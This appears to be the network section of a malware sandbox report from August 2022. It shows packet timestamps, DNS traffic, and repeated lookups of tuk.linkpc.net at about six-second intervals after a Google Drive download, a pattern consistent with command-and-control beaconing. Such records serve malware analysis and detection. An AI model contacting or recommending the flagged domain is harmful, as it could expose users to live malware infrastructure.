Aug 5, 2022 11:32:58.663646936 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.706526995 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.902692080 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.903125048 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.903147936 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.903254986 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.903289080 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.903554916 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.904272079 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.904478073 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.904881954 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.905155897 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.905174017 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.905327082 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.908139944 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.908457994 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.911192894 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.911470890 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.911494017 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.911678076 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.913008928 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.913110018 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.913242102 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.913264990 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.913360119 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.913413048 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.913496017 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.913588047 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.913746119 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.913768053 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.913839102 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.913964033 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.914242983 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.914469957 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.914494038 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.914638996 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.914671898 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.914817095 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.915133953 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.915268898 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.915287971 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.915507078 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.915529966 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.915792942 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.916122913 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.916248083 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.916269064 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.916286945 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.916491032 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.917030096 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.917176962 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.917195082 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.917407036 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.917428970 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.917618036 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.917917013 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.918026924 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.918068886 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.918087006 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.918164968 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.918304920 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.918746948 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.918895006 CEST	49792	443	192.168.11.20	142.250.181.225
Aug 5, 2022 11:32:58.918912888 CEST	443	49792	142.250.181.225	192.168.11.20
Aug 5, 2022 11:32:58.919145107 CEST	49792	443	192.168.11.20	142.250.181.225

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 5, 2022 11:32:57.904799938 CEST	55232	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:32:57.913872957 CEST	53	55232	1.1.1.1	192.168.11.20
Aug 5, 2022 11:32:58.583528042 CEST	62809	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:32:58.621520996 CEST	53	62809	1.1.1.1	192.168.11.20
Aug 5, 2022 11:33:00.786587000 CEST	62021	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:33:00.911015034 CEST	53	62021	1.1.1.1	192.168.11.20
Aug 5, 2022 11:33:07.131448984 CEST	49997	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:33:07.255804062 CEST	53	49997	1.1.1.1	192.168.11.20
Aug 5, 2022 11:33:13.592540026 CEST	54559	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:33:13.717253923 CEST	53	54559	1.1.1.1	192.168.11.20
Aug 5, 2022 11:33:20.015330076 CEST	59529	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:33:20.131943941 CEST	53	59529	1.1.1.1	192.168.11.20
Aug 5, 2022 11:33:26.601202965 CEST	53180	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:33:26.716433048 CEST	53	53180	1.1.1.1	192.168.11.20
Aug 5, 2022 11:33:33.132432938 CEST	64465	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:33:33.256779909 CEST	53	64465	1.1.1.1	192.168.11.20
Aug 5, 2022 11:33:39.879178047 CEST	58479	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:33:40.003887892 CEST	53	58479	1.1.1.1	192.168.11.20
Aug 5, 2022 11:33:46.304721117 CEST	51159	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:33:46.431785107 CEST	53	51159	1.1.1.1	192.168.11.20
Aug 5, 2022 11:33:52.573375940 CEST	60385	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:33:52.688828945 CEST	53	60385	1.1.1.1	192.168.11.20
Aug 5, 2022 11:33:59.279649973 CEST	61110	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:33:59.289171934 CEST	53	61110	1.1.1.1	192.168.11.20
Aug 5, 2022 11:34:06.190618992 CEST	52864	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:34:06.200170040 CEST	53	52864	1.1.1.1	192.168.11.20
Aug 5, 2022 11:34:12.673532963 CEST	53434	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:34:12.789232016 CEST	53	53434	1.1.1.1	192.168.11.20
Aug 5, 2022 11:34:18.672377110 CEST	57393	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:34:18.797213078 CEST	53	57393	1.1.1.1	192.168.11.20
Aug 5, 2022 11:34:24.717828989 CEST	58141	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:34:24.727416992 CEST	53	58141	1.1.1.1	192.168.11.20
Aug 5, 2022 11:34:30.576075077 CEST	63528	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:34:30.586200953 CEST	53	63528	1.1.1.1	192.168.11.20
Aug 5, 2022 11:34:36.481532097 CEST	57706	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:34:36.597254992 CEST	53	57706	1.1.1.1	192.168.11.20
Aug 5, 2022 11:34:42.556569099 CEST	63445	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:34:42.566190004 CEST	53	63445	1.1.1.1	192.168.11.20
Aug 5, 2022 11:34:48.400950909 CEST	57596	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:34:48.410609007 CEST	53	57596	1.1.1.1	192.168.11.20
Aug 5, 2022 11:34:54.322215080 CEST	53326	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:34:54.438241005 CEST	53	53326	1.1.1.1	192.168.11.20
Aug 5, 2022 11:34:58.679541111 CEST	52008	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:34:58.689017057 CEST	53	52008	1.1.1.1	192.168.11.20
Aug 5, 2022 11:35:04.584121943 CEST	51246	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:35:04.593795061 CEST	53	51246	1.1.1.1	192.168.11.20
Aug 5, 2022 11:35:10.535805941 CEST	60057	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:35:11.549949884 CEST	60057	53	192.168.11.20	9.9.9.9
Aug 5, 2022 11:35:11.581832886 CEST	53	60057	9.9.9.9	192.168.11.20
Aug 5, 2022 11:35:11.583400965 CEST	58828	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:35:11.708448887 CEST	53	58828	1.1.1.1	192.168.11.20
Aug 5, 2022 11:35:12.653842926 CEST	53	60057	1.1.1.1	192.168.11.20
Aug 5, 2022 11:35:17.604959965 CEST	52691	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:35:17.614592075 CEST	53	52691	1.1.1.1	192.168.11.20
Aug 5, 2022 11:35:23.501876116 CEST	62898	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:35:23.625874043 CEST	53	62898	1.1.1.1	192.168.11.20
Aug 5, 2022 11:35:29.517004013 CEST	63367	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:35:29.640959978 CEST	53	63367	1.1.1.1	192.168.11.20
Aug 5, 2022 11:35:35.530438900 CEST	53471	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:35:35.540015936 CEST	53	53471	1.1.1.1	192.168.11.20
Aug 5, 2022 11:35:41.435544014 CEST	63917	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:35:41.444996119 CEST	53	63917	1.1.1.1	192.168.11.20
Aug 5, 2022 11:35:47.387442112 CEST	50814	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:35:47.397044897 CEST	53	50814	1.1.1.1	192.168.11.20
Aug 5, 2022 11:35:53.247137070 CEST	62654	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:35:53.371336937 CEST	53	62654	1.1.1.1	192.168.11.20
Aug 5, 2022 11:35:59.275289059 CEST	51946	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:35:59.284746885 CEST	53	51946	1.1.1.1	192.168.11.20
Aug 5, 2022 11:36:05.227123976 CEST	57449	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:36:05.236743927 CEST	53	57449	1.1.1.1	192.168.11.20
Aug 5, 2022 11:36:11.117989063 CEST	62344	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:36:11.243120909 CEST	53	62344	1.1.1.1	192.168.11.20
Aug 5, 2022 11:36:17.086630106 CEST	52934	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:36:17.095899105 CEST	53	52934	1.1.1.1	192.168.11.20
Aug 5, 2022 11:36:23.044409990 CEST	57625	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:36:23.173751116 CEST	53	57625	1.1.1.1	192.168.11.20
Aug 5, 2022 11:36:29.065849066 CEST	54797	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:36:30.095171928 CEST	54797	53	192.168.11.20	9.9.9.9
Aug 5, 2022 11:36:30.099138975 CEST	53	54797	9.9.9.9	192.168.11.20
Aug 5, 2022 11:36:30.684124947 CEST	53	54797	1.1.1.1	192.168.11.20
Aug 5, 2022 11:36:36.018923044 CEST	54694	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:36:36.028650999 CEST	53	54694	1.1.1.1	192.168.11.20
Aug 5, 2022 11:36:41.969168901 CEST	54976	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:36:41.982587099 CEST	53	54976	1.1.1.1	192.168.11.20
Aug 5, 2022 11:36:47.874558926 CEST	57482	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:36:47.884468079 CEST	53	57482	1.1.1.1	192.168.11.20
Aug 5, 2022 11:36:53.733606100 CEST	60219	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:36:53.743386984 CEST	53	60219	1.1.1.1	192.168.11.20
Aug 5, 2022 11:36:59.637025118 CEST	50980	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:36:59.646581888 CEST	53	50980	1.1.1.1	192.168.11.20
Aug 5, 2022 11:37:05.588907003 CEST	50510	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:37:05.598385096 CEST	53	50510	1.1.1.1	192.168.11.20
Aug 5, 2022 11:37:11.446918011 CEST	60435	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:37:11.456281900 CEST	53	60435	1.1.1.1	192.168.11.20
Aug 5, 2022 11:37:17.351824045 CEST	55622	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:37:17.361181021 CEST	53	55622	1.1.1.1	192.168.11.20
Aug 5, 2022 11:37:23.272507906 CEST	62139	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:37:23.283582926 CEST	53	62139	1.1.1.1	192.168.11.20
Aug 5, 2022 11:37:29.177437067 CEST	62494	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:37:29.186938047 CEST	53	62494	1.1.1.1	192.168.11.20
Aug 5, 2022 11:37:35.129445076 CEST	51603	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:37:35.139229059 CEST	53	51603	1.1.1.1	192.168.11.20
Aug 5, 2022 11:37:41.020170927 CEST	56330	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:37:41.029963017 CEST	53	56330	1.1.1.1	192.168.11.20
Aug 5, 2022 11:37:46.923991919 CEST	54773	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:37:47.040210009 CEST	53	54773	1.1.1.1	192.168.11.20
Aug 5, 2022 11:37:52.937983990 CEST	64373	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:37:52.947561026 CEST	53	64373	1.1.1.1	192.168.11.20
Aug 5, 2022 11:37:58.844466925 CEST	58380	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:37:59.887749910 CEST	58380	53	192.168.11.20	9.9.9.9
Aug 5, 2022 11:37:59.892019987 CEST	53	58380	9.9.9.9	192.168.11.20
Aug 5, 2022 11:37:59.892657042 CEST	59309	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:38:00.464914083 CEST	53	58380	1.1.1.1	192.168.11.20
Aug 5, 2022 11:38:00.903049946 CEST	59309	53	192.168.11.20	9.9.9.9
Aug 5, 2022 11:38:00.906367064 CEST	53	59309	9.9.9.9	192.168.11.20
Aug 5, 2022 11:38:02.018528938 CEST	53	59309	1.1.1.1	192.168.11.20
Aug 5, 2022 11:38:04.921719074 CEST	56135	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:38:04.931158066 CEST	53	56135	1.1.1.1	192.168.11.20
Aug 5, 2022 11:38:10.871596098 CEST	60426	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:38:10.881320000 CEST	53	60426	1.1.1.1	192.168.11.20
Aug 5, 2022 11:38:16.729809046 CEST	64305	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:38:16.854331017 CEST	53	64305	1.1.1.1	192.168.11.20
Aug 5, 2022 11:38:22.790716887 CEST	63130	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:38:22.800626040 CEST	53	63130	1.1.1.1	192.168.11.20
Aug 5, 2022 11:38:28.657541990 CEST	49921	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:38:29.662511110 CEST	49921	53	192.168.11.20	9.9.9.9
Aug 5, 2022 11:38:29.666232109 CEST	53	49921	9.9.9.9	192.168.11.20
Aug 5, 2022 11:38:29.667045116 CEST	55547	53	192.168.11.20	9.9.9.9
Aug 5, 2022 11:38:29.670787096 CEST	53	55547	9.9.9.9	192.168.11.20
Aug 5, 2022 11:38:30.276550055 CEST	53	49921	1.1.1.1	192.168.11.20
Aug 5, 2022 11:38:33.678966045 CEST	63959	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:38:33.688431978 CEST	53	63959	1.1.1.1	192.168.11.20
Aug 5, 2022 11:38:39.646378040 CEST	64898	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:38:39.761596918 CEST	53	64898	1.1.1.1	192.168.11.20
Aug 5, 2022 11:38:45.598529100 CEST	54867	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:38:45.608515024 CEST	53	54867	1.1.1.1	192.168.11.20
Aug 5, 2022 11:38:51.520092964 CEST	58591	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:38:51.646773100 CEST	53	58591	1.1.1.1	192.168.11.20
Aug 5, 2022 11:38:57.579916954 CEST	63629	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:38:57.589534044 CEST	53	63629	1.1.1.1	192.168.11.20
Aug 5, 2022 11:39:03.438503027 CEST	52762	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:39:04.451811075 CEST	52762	53	192.168.11.20	9.9.9.9
Aug 5, 2022 11:39:04.456307888 CEST	53	52762	9.9.9.9	192.168.11.20
Aug 5, 2022 11:39:04.457096100 CEST	57291	53	192.168.11.20	9.9.9.9
Aug 5, 2022 11:39:04.461613894 CEST	53	57291	9.9.9.9	192.168.11.20
Aug 5, 2022 11:39:05.056463957 CEST	53	52762	1.1.1.1	192.168.11.20
Aug 5, 2022 11:39:08.468300104 CEST	64823	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:39:08.477998972 CEST	53	64823	1.1.1.1	192.168.11.20
Aug 5, 2022 11:39:12.732745886 CEST	51456	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:39:12.741753101 CEST	53	51456	1.1.1.1	192.168.11.20
Aug 5, 2022 11:39:18.637866974 CEST	58993	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:39:19.651629925 CEST	58993	53	192.168.11.20	9.9.9.9
Aug 5, 2022 11:39:19.655186892 CEST	53	58993	9.9.9.9	192.168.11.20
Aug 5, 2022 11:39:19.655885935 CEST	62306	53	192.168.11.20	9.9.9.9
Aug 5, 2022 11:39:19.659593105 CEST	53	62306	9.9.9.9	192.168.11.20
Aug 5, 2022 11:39:20.255547047 CEST	53	58993	1.1.1.1	192.168.11.20
Aug 5, 2022 11:39:23.668332100 CEST	62548	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:39:23.677767992 CEST	53	62548	1.1.1.1	192.168.11.20
Aug 5, 2022 11:39:29.621148109 CEST	54614	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:39:29.745368958 CEST	53	54614	1.1.1.1	192.168.11.20
Aug 5, 2022 11:39:35.587583065 CEST	64778	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:39:35.597193003 CEST	53	64778	1.1.1.1	192.168.11.20
Aug 5, 2022 11:39:41.523385048 CEST	57726	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:39:41.534070969 CEST	53	57726	1.1.1.1	192.168.11.20
Aug 5, 2022 11:39:47.383136034 CEST	51805	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:39:47.392364979 CEST	53	51805	1.1.1.1	192.168.11.20
Aug 5, 2022 11:39:53.286617994 CEST	49863	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:39:53.296116114 CEST	53	49863	1.1.1.1	192.168.11.20
Aug 5, 2022 11:39:59.238343954 CEST	56773	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:39:59.248460054 CEST	53	56773	1.1.1.1	192.168.11.20
Aug 5, 2022 11:40:05.152400970 CEST	57730	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:40:05.162075043 CEST	53	57730	1.1.1.1	192.168.11.20
Aug 5, 2022 11:40:11.032572031 CEST	57077	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:40:11.148859024 CEST	53	57077	1.1.1.1	192.168.11.20
Aug 5, 2022 11:40:17.031421900 CEST	50847	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:40:17.041599989 CEST	53	50847	1.1.1.1	192.168.11.20
Aug 5, 2022 11:40:22.936971903 CEST	60891	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:40:22.946896076 CEST	53	60891	1.1.1.1	192.168.11.20
Aug 5, 2022 11:40:28.872673035 CEST	57836	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:40:28.882746935 CEST	53	57836	1.1.1.1	192.168.11.20
Aug 5, 2022 11:40:34.779040098 CEST	55617	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:40:34.789006948 CEST	53	55617	1.1.1.1	192.168.11.20
Aug 5, 2022 11:40:40.696635008 CEST	62180	53	192.168.11.20	1.1.1.1
Aug 5, 2022 11:40:40.812553883 CEST	53	62180	1.1.1.1	192.168.11.20

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Aug 5, 2022 11:35:12.654064894 CEST	192.168.11.20	1.1.1.1	cb04	(Port unreachable)	Destination Unreachable
Aug 5, 2022 11:36:30.684325933 CEST	192.168.11.20	1.1.1.1	cb04	(Port unreachable)	Destination Unreachable
Aug 5, 2022 11:38:00.465068102 CEST	192.168.11.20	1.1.1.1	cb04	(Port unreachable)	Destination Unreachable
Aug 5, 2022 11:38:02.018742085 CEST	192.168.11.20	1.1.1.1	cb04	(Port unreachable)	Destination Unreachable
Aug 5, 2022 11:38:30.276910067 CEST	192.168.11.20	1.1.1.1	cb04	(Port unreachable)	Destination Unreachable
Aug 5, 2022 11:39:05.056691885 CEST	192.168.11.20	1.1.1.1	cb04	(Port unreachable)	Destination Unreachable
Aug 5, 2022 11:39:20.255884886 CEST	192.168.11.20	1.1.1.1	cb04	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 5, 2022 11:32:57.904799938 CEST	192.168.11.20	1.1.1.1	0x9683	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Aug 5, 2022 11:32:58.583528042 CEST	192.168.11.20	1.1.1.1	0x4393	Standard query (0)	doc-14-70-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:00.786587000 CEST	192.168.11.20	1.1.1.1	0x1f73	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:07.131448984 CEST	192.168.11.20	1.1.1.1	0xf897	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:13.592540026 CEST	192.168.11.20	1.1.1.1	0xabf9	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:20.015330076 CEST	192.168.11.20	1.1.1.1	0x9b46	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:26.601202965 CEST	192.168.11.20	1.1.1.1	0x3b18	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:33.132432938 CEST	192.168.11.20	1.1.1.1	0xa1f9	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:39.879178047 CEST	192.168.11.20	1.1.1.1	0xcc71	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:46.304721117 CEST	192.168.11.20	1.1.1.1	0x528c	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:52.573375940 CEST	192.168.11.20	1.1.1.1	0xfb82	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:33:59.279649973 CEST	192.168.11.20	1.1.1.1	0xa88d	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:06.190618992 CEST	192.168.11.20	1.1.1.1	0xd9f1	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:12.673532963 CEST	192.168.11.20	1.1.1.1	0x8241	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:18.672377110 CEST	192.168.11.20	1.1.1.1	0x1019	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:24.717828989 CEST	192.168.11.20	1.1.1.1	0x8688	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:30.576075077 CEST	192.168.11.20	1.1.1.1	0xfdb9	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:36.481532097 CEST	192.168.11.20	1.1.1.1	0xdf35	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:42.556569099 CEST	192.168.11.20	1.1.1.1	0x8511	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:48.400950909 CEST	192.168.11.20	1.1.1.1	0xacca	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:54.322215080 CEST	192.168.11.20	1.1.1.1	0x396b	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:34:58.679541111 CEST	192.168.11.20	1.1.1.1	0xe2b1	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:04.584121943 CEST	192.168.11.20	1.1.1.1	0x54c5	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:10.535805941 CEST	192.168.11.20	1.1.1.1	0xe796	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:11.549949884 CEST	192.168.11.20	9.9.9.9	0xe796	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:11.583400965 CEST	192.168.11.20	1.1.1.1	0x259e	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:17.604959965 CEST	192.168.11.20	1.1.1.1	0xc2bb	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:23.501876116 CEST	192.168.11.20	1.1.1.1	0xe7d3	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:29.517004013 CEST	192.168.11.20	1.1.1.1	0x3bda	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:35.530438900 CEST	192.168.11.20	1.1.1.1	0x1eab	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:41.435544014 CEST	192.168.11.20	1.1.1.1	0x95f6	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:47.387442112 CEST	192.168.11.20	1.1.1.1	0xbbd9	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:53.247137070 CEST	192.168.11.20	1.1.1.1	0x138c	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:35:59.275289059 CEST	192.168.11.20	1.1.1.1	0xd0ef	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:05.227123976 CEST	192.168.11.20	1.1.1.1	0x3ed6	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:11.117989063 CEST	192.168.11.20	1.1.1.1	0x6433	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:17.086630106 CEST	192.168.11.20	1.1.1.1	0x6fb3	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:23.044409990 CEST	192.168.11.20	1.1.1.1	0xeb6f	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:29.065849066 CEST	192.168.11.20	1.1.1.1	0x4342	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
Aug 5, 2022 11:36:30.095171928 CEST	192.168.11.20	9.9.9.9	0x4342	Standard query (0)	tuk.linkpc.net	A (IP address)	IN (0x0001)
